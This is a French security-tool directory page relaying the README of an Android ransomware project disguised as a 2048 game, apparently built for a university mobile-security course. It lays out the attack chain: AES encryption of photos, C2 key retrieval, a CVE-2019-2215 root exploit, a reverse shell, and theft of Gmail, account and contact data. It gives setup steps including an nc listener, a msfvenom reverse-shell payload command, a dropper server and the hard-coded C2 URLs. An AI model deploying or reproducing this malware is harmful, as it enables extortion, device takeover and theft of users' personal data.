Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Rootsmart-v2.0 — Développement de ransomware Android - chiffrement AES256 + CVE-2019-2215 (reverse shell root) + exfiltration de données | Kitploit
Outils/GitHubGitHub/crackercat/rootsmart-v2.0
Sécurité AndroidOutils de Chiffrement/DéchiffrementAnalyse des VulnérabilitésExploitationRétro-ingénierieExfiltration de DonnéesTests d'IntrusionSécurité MobileCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges Utiles
27il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
crackercat/rootsmart-v2.0

Rootsmart-v2.0

Développement de ransomware Android - chiffrement AES256 + CVE-2019-2215 (reverse shell root) + exfiltration de données

Voir le dépôt
Partager

Rootsmart 2.0 w/ cve-2019-2215 + Ransomware

Avertissement

Ce projet est uniquement à des fins éducatives. Ce projet utilise du code provenant de rkshrksh/2048-Game et de kangtastic/cve-2019-2215.


Description du projet

Ce projet fait partie du module Sécurité Mobile du Singapore Institute of Technology. Le projet a été réalisé en 6 semaines et visait à développer une application Android malveillante. Ce faisant, cela nous a aidés à apprendre comment les mécanismes de sécurité sont implémentés dans un OS Android et comment exercer le OWASP Mobile Top 10:2017 M8 - Code Tampering.

Le projet est une preuve de concept pour présenter un ransomware personnalisé qui utilise le chiffrement AES, en exploitant la cve-2019-2215, et en exfiltrant également les données de l'appareil infecté.

Il est testé sur Android 10 et Google Pixel 2 XL.

root@kitploit:~
├── 2048-Game 					// Dossier du projet Android
├── 2048-keystore				// Keystore de test
├── cve-2019-2215				// CVE-2019-2215 modifié
│	└── cve-2019-2215.c
├── dropper_server				// Répertoire du serveur dropper 
│	├── cve-2019-2215			// Contenu de shells.zip avant compression
│	├── dropper_server.py		// Programme du serveur dropper
│	├── exfiltrated_data.log
│	├── masterkeys.txt
│	├── ncat.exe 				// Binaire Netcat Windows - pour l'écouteur de shell inverse
│	├── requirements.txt
│	├── shells.zip  			// shells.zip hébergé à la racine du serveur dropper
│	└── venv
└── test_images    				// images_test pour faciliter adb push <image.ext> /sdcard/Pictures
Vecteur d'attaque :
  1. Installer, exécuter l'application et accorder les autorisations
  2. Le ransomware chiffrera en AES tous les fichiers dans /sdcard/Pictures
  3. Chaque fichier sera chiffré avec une clé générée aléatoirement
  4. Les clés seront stockées dans /sdcard/keys.json où chaque paire clé:valeur est chemin_fichier:clé
  5. Requête HTTP GET vers le serveur C2 /get_mk pour récupérer la MasterKey et l'ID de la victime dans le corps de la réponse
  6. La MasterKey chiffrera keys.json, l'ID de la victime sera stocké dans /sdcard/victimID.txt
  7. L'application téléchargera shells.zip et décompressera le contenu
  8. Exécutera le binaire cve-2019-2215 depuis le contenu décompressé
  9. Un processus shell root sera lancé et exécutera install.sh depuis le contenu décompressé
  10. Install.sh exécutera rs.elf depuis le contenu décompressé pour envoyer une connexion inverse vers le serveur d'attaque
  11. L'application exfiltrera le gmail, les informations de compte utilisateur et les contacts de l'appareil.
Démonstration

https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4


C2 (Command & Control) - Configuration

Pour ce test, assurez-vous que le téléphone victime et le serveur C2 sont dans le même sous-réseau (sinon, hébergez le C2 sur Internet public). Il y a 3 endpoints pour le serveur C2 que l'on trouve dans dropper/dropper_server.py :

  1. /process_command - GET pour télécharger shells.zip et exécuter l'exploit root cve-2019-2215
  2. /get_mk - GET pour obtenir la paire victimID:masterkey afin de chiffrer /sdcard/keys.json
  3. /postData - POST pour exfiltrer les gmail, contacts, informations de compte
Serveur Reverse Shell
root@kitploit:~
nc -lvnp 1337 # Idéalement, cela devrait être la même IP que le serveur dropper
Serveur Dropper
root@kitploit:~
# Générer le payload rs.elf
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<IP de l'attaquant> LPORT=<Port de l'attaquant> -f elf > rs.elf

# Il est préférable d'exécuter Flask sous Windows si WSL ne redirige pas le trafic localhost vers l'hôte Windows
cd dropper
python3 -m venv venv # Créer l'environnement virtuel

# Activer l'environnement virtuel
. venv/bin/activate # Linux
venv\Scripts\activate.bat # Windows
pip install -r requirements.txt --upgrade pip # Assurez-vous que le shell hôte est root/Administrateur

# Exécuter le serveur C2
python3 dropper_server.py # WSL
python dropper_server.py # Windows

shells.zip dans /dropper

  1. Aller dans le dossier dropper/cve-2019-2215
  2. Après avoir créé rs.elf, compresser rs.elf + cve-2019-2215, install.sh
  3. Renommer le fichier zip en shells.zip
  4. Déplacer shells.zip vers /dropper

Modifier ce qui suit avant de compiler l'APK

Classes Java

root@kitploit:~
// Fichier : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// Modifier l'IP et le port selon l'IP et le port du serveur dropper
String URL = "http://192.168.157.73:8080/process_command"; // Ligne 19

// Fichier : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// Modifier l'IP et le port selon l'IP et le port du serveur dropper
String URL = "http://192.168.157.73:8080/get_mk"; // Ligne 45

// Fichier : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// Modifier l'IP et le port selon l'IP et le port du serveur dropper
String urlString = "http://192.168.157.73:8080/postData"; // Ligne 32
Télécharger l’outil